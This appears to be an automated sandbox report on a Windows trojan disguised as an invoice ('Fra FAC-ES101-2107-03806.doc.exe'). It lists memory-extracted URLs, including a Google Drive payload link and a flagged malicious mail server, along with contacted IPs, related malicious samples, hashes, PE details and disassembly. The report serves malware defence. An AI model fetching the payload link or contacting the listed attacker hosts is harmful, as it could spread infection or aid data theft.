https://doc-04-ak-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq835moktnu71nht8627dleqonv/1634123175000/00240525256395999725/*/1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mail.tccinfaes.com	RegAsm.exe, 0000001B.00000002.5640852632.000000001DE6C000.00000004.00000001.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://x1.i.lencr.org/	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.27.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://L3TFBaO3nLwUP4KRw.comt-	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://doc-04-ak-docs.googleusercontent.com/q	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false		high
http://cps.letsencrypt.org0	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-04-ak-docs.googleusercontent.com/	RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	false		high
http://x1.c.lencr.org/0	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/0	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://tccinfaes.com	RegAsm.exe, 0000001B.00000002.5640852632.000000001DE6C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aSuCYu.com	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	RegAsm.exe, 0000001B.00000002.5640184321.000000001DDFE000.00000004.00000001.sdmp	false		high
https://doc-04-ak-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq8	RegAsm.exe, 0000001B.00000003.1147991565.0000000001100000.00000004.00000001.sdmp	false		high
https://drive.google.com/(&	RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	false		high
http://r3.i.lencr.org/0)	RegAsm.exe, 0000001B.00000002.5623907420.00000000010C0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://L3TFBaO3nLwUP4KRw.com	RegAsm.exe, 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5640613473.000000001DE54000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.174	drive.google.com	United States	15169	GOOGLEUS	false
188.93.227.195	tccinfaes.com	Portugal	8426	CLARANET-ASClaraNETLTDGB	true
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1639
Start date:	13.10.2021
Start time:	13:03:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Fra FAC-ES101-2107-03806.doc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@8/5@4/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 73 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): IntelPTTEKRecertification.exe, dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.82.19.171, 40.117.96.136, 204.79.197.200, 13.107.21.200, 13.107.5.88, 20.49.157.6, 40.112.88.60, 20.199.120.85, 20.54.89.106, 52.109.8.21, 20.54.89.15, 40.125.122.151, 52.242.97.97, 40.125.122.176, 20.82.210.154, 92.123.195.35, 92.123.195.73, 93.184.221.240, 2.21.140.114, 104.89.32.83, 20.199.120.151, 20.199.120.182, 51.124.78.146, 40.126.31.139, 20.190.159.138, 40.126.31.143, 40.126.31.135, 40.126.31.6, 40.126.31.4, 40.126.31.8, 40.126.31.137 Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, hlb.apr-52dd2-0.edgecastdns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, sls.update.microsoft.com.akadns.net, ris-prod.trafficmanager.net, wd-prod-cp.trafficmanager.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net, e8652.dscx.akamaiedge.net, e-0009.e-msedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, slscr.update.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, wdcp.microsoft.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, manage.devcenter.microsoft.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:05:44	Task Scheduler	Run new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
13:06:48	API Interceptor	2545x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
188.93.227.195	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse
	FAKTURA I PARAGONY.exe	Get hash	malicious	Browse
	COPIA DE PAGO.exe	Get hash	malicious	Browse
	orientite.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	DDC50015.exe	Get hash	malicious	Browse
	Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse
	DHL00051021_PDF.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	seeds.exe	Get hash	malicious	Browse
	Product LIsts.exe	Get hash	malicious	Browse
	FACTURA Y ALBARANES_pdf.exe	Get hash	malicious	Browse
	Scan.exe	Get hash	malicious	Browse
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	Browse
	Struggleres5.exe	Get hash	malicious	Browse
	BBVA-Confirming Remesas Aceptadas.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Payment_Advice.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLARANET-ASClaraNETLTDGB	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse	188.93.227.195
	b3astmode.arm7	Get hash	malicious	Browse	80.168.0.124
	jew.arm7	Get hash	malicious	Browse	212.49.223.28
	sora.arm7	Get hash	malicious	Browse	89.206.151.169
	FAKTURA I PARAGONY.exe	Get hash	malicious	Browse	188.93.227.195
	COPIA DE PAGO.exe	Get hash	malicious	Browse	188.93.227.195
	sora.arm	Get hash	malicious	Browse	195.102.64.245
	LSCtJ6YbhB	Get hash	malicious	Browse	195.102.64.215
	orientite.exe	Get hash	malicious	Browse	188.93.227.195
	PO.exe	Get hash	malicious	Browse	188.93.227.195
	DDC50015.exe	Get hash	malicious	Browse	188.93.227.195
	UnHAnaAW.x86	Get hash	malicious	Browse	212.49.223.21
	yR25n6pfMS	Get hash	malicious	Browse	195.157.0.198
	Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse	188.93.227.195
	DHL00051021_PDF.exe	Get hash	malicious	Browse	188.93.227.195
	FACTURA.exe	Get hash	malicious	Browse	188.93.227.195
	FACTURA.exe	Get hash	malicious	Browse	188.93.227.195
	JE91d4cv34	Get hash	malicious	Browse	81.171.235.227
	seeds.exe	Get hash	malicious	Browse	188.93.227.195
	Product LIsts.exe	Get hash	malicious	Browse	188.93.227.195

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	correction HAWB.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	UZWdHg3hWA.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	LBJiq1QBaH.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	Statement of Account.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	art-1881052385.xls	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	184285013-044310-sanlccjavap0003-7069_pdf (5).exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	DOC 10132021.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	WIRE ADVICE.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	WireCopy.html	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	UGS2021100716241.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	WireCopy.html	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	Rust_hack_v6.4.2_x64_stable.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	0810202 import Inquiry ref- November order 2021.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	Document-10122021 81258 PM.html	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	ajjVYRO.vbs	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	IMG-pic 0699821.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161
	HJmXSL9b6P.exe	Get hash	malicious	Browse	142.250.185.174 142.250.185.161

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, 61157 bytes, 1 file
Category:	dropped
Size (bytes):	61157
Entropy (8bit):	7.995991509218449
Encrypted:	true
SSDEEP:	1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
MD5:	AB5C36D10261C173C5896F3478CDC6B7
SHA1:	87AC53810AD125663519E944BC87DED3979CBEE4
SHA-256:	F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
SHA-512:	E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
Malicious:	false
Preview:	MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....\|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.\|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"\|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....\|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..\|.!k0...\|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..\|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'\|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.773803200765873
Encrypted:	false
SSDEEP:	3:kkFklqibkNl1fllXlE/zMc/JlXNNX8RolJuRdyo1dlUKlGXJlDdt:kKzJNlC1/pNMa8Rdy+UKcXP
MD5:	C0F6E5DE5350F04A1A006A5FD4A782A0
SHA1:	0EB93B14518AF71AAE6DC792D64EC113FE8EF047
SHA-256:	922A6F70711F210CFFC79FE8B2D221B6F9BE498B0BB5AC57AEE036FB0BBDE63C
SHA-512:	5FFD74A9B80AECA9CF73CC21E5DC4675FA864A378AD614D0744CE35DA1F27E3197E9FA2A56674A41F398E5D712635A1BBE3FC33610C75AFF3DC3E9551A407FFA
Malicious:	false
Preview:	p...... ........Y.\|@...(....................................................... ..........~...:...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.108423439276625
Encrypted:	false
SSDEEP:	6:kKn6EledFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:f1q2kPlE99SNxAhUefit
MD5:	20FAB887BAB664264C09893468BB7814
SHA1:	7DBF7EA2C65D6981A7AF9B0AEA8970B3538F4B39
SHA-256:	0FC9202FDB486BDE0F5381EB1D2CCAB23E9BD2D3FEB087A820175E2206691E18
SHA-512:	367F0F1621CF18C94F119A7566EACFC842E459105D5E523CA37B4B4556F365E8731CDC024F7EE610C003A40370332D0A98B8E07C6E3894A1837F324F16AA8420
Malicious:	false
Preview:	p...... ........f..\|@...(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.81188292947866
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Fra FAC-ES101-2107-03806.doc.exe
File size:	102400
MD5:	18b804e21a3c1c80c195e7d20dc38477
SHA1:	9622e70cd6db56de3488e99cd18c5f51e54afb64
SHA256:	cbc14388711803d5a3f90396d4d33c9b3da952c37a5d919daed329cbd487c1b4
SHA512:	21eade10fb00f4ef5356025ce037983b2e220835345b4bd141f1063367da309390caa83d9d822177bf5c3ef900c311a12afff2f9731787f0afb4c6f35576ffec
SSDEEP:	1536:tfD8AJkfjAx20HgXeyTftunugia21jbnD:tfeUxxAZnn/n
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...(.KY.................P...0......x........`....@........

File Icon


Icon Hash:	69e1c892f664c884

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x594BF828 [Thu Jun 22 17:02:32 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	669316531b5190f02843878b6ed87394

Entrypoint Preview

Instruction
push 00410384h
call 00007F5E386B3C95h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+esi*8-01239E7Dh], bl
inc ebp
inc esi
mov ecx, edx
out 90h, eax
mov eax, dword ptr [00E6209Fh]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+6Eh], cl
jbe 00007F5E386B3D0Bh
je 00007F5E386B3D07h
jc 00007F5E386B3D07h
xor dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
cmp byte ptr [ebx+59h], bl
out dx, al
mov edi, 4A47AB16h
stosb
fbld [esi-764BB8D2h]
ret
cmpsd
mov ch, 2Dh
push 00000025h
rcl byte ptr [esi-71DF64BCh], cl
out 29h, eax
and byte ptr [eax+40h], 0000003Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ebx
in eax, dx
add byte ptr [eax], al
sbb eax, 00000009h
or byte ptr [eax], al
jc 00007F5E386B3D0Ch
jbe 00007F5E386B3D0Ah
jne 00007F5E386B3D15h
add byte ptr [44000E01h], cl
push esi
inc ebp
dec ebx
dec edi
dec esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x150d4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x1cb2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x134	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14588	0x15000	False	0.496163504464	data	6.24678665883	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0xd0c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x1cb2	0x2000	False	0.348510742188	data	3.76228374891	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x189b4	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors	English	United States
CUSTOM	0x180f6	0x8be	MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel	English	United States
CUSTOM	0x17df8	0x2fe	MS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixel	English	United States
RT_ICON	0x17550	0x8a8	data
RT_GROUP_ICON	0x1753c	0x14	data
RT_VERSION	0x171a0	0x39c	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaDateVar, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Collides Systems, Inc.
InternalName	Saarede3
FileVersion	4.00
CompanyName	Collides Systems, Inc.
LegalTrademarks	Collides Systems, Inc.
Comments	Collides Systems, Inc.
ProductName	Collides Systems, Inc.
ProductVersion	4.00
FileDescription	Collides Systems, Inc.
OriginalFilename	Saarede3.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 13:06:37.426265955 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.426346064 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.426481009 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.455434084 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.455471039 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.508017063 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.508210897 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.509462118 CEST	443	49755	142.250.185.174	192.168.11.20
Oct 13, 2021 13:06:37.509695053 CEST	49755	443	192.168.11.20	142.250.185.174
Oct 13, 2021 13:06:37.708281994 CEST	49755	443	192.168.11.20	142.250.185.174
